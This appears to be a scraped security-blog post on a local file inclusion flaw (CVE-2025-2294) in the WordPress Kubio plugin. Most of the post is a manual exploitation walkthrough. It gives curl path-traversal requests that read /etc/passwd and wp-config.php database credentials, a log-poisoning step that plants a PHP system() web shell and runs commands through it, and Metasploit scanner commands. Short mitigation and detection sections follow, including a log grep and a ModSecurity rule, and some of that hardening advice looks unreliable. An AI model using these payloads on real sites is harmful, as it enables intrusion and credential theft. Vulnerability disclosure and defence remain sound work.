WordPress Kubio Plugin LFI Exploit (CVE–)

By /

Listen to this Post

A critical Local File Inclusion (LFI) vulnerability, tracked as CVE-2025-2294, has been discovered in the WordPress Kubio Plugin, which boasts over 90,000+ active installations. This flaw allows attackers to read sensitive files on the server, potentially leading to further exploitation, such as remote code execution (RCE) or credential theft.

Affected Versions:

  • Kubio Plugin versions ≤ 2.0.0

Exploit Details:

The vulnerability arises due to improper file path sanitization, enabling attackers to traverse directories and access restricted files (e.g., /etc/passwd, wp-config.php).

You Should Know:

Manual Exploitation Steps (LFI)

1. Identify Vulnerable Endpoint:

curl -s "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../etc/passwd"

If the server returns /etc/passwd, the site is vulnerable.

2. Retrieve WordPress Config (wp-config.php):

curl -s "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../wp-config.php" | grep DB_

3. Log Poisoning (If PHP Logs Are Accessible):

curl -X POST "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../var/log/apache2/access.log" --data "<?php system(\$_GET['cmd']); ?>"

Then execute commands via:

curl "http://target.com/wp-content/plugins/kubio/page.php?file=../../../../var/log/apache2/access.log&cmd=id"

Mitigation Steps:

  • Update Kubio Plugin to the latest version.
  • Restrict File Access via .htaccess: 
    <FilesMatch "\.(php|log|ini)$">
Deny from all
</FilesMatch>
  • Disable Directory Traversal in php.ini: 
    open_basedir = /var/www/html/

Automated Scanning (Metasploit):

msf6 > use auxiliary/scanner/http/wordpress_kubio_lfi 
msf6 > set RHOSTS target.com 
msf6 > run

What Undercode Say:

This LFI flaw highlights the risks of improper input validation in WordPress plugins. System admins should:
– Monitor file inclusion attempts via: 

grep "kubio/page.php" /var/log/apache2/access.log | grep "file="

– Use WAF Rules (ModSecurity): 

SecRule ARGS_GET:file "@contains ../" "deny,log,msg:'LFI Attempt'"

– Check Active Plugins periodically: 

wp plugin list --status=active --allow-root

Expected Output:

A secured WordPress instance with no unauthorized file access and updated plugins.

Reference:

References:

Reported By: Dersonbabayan Cve – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: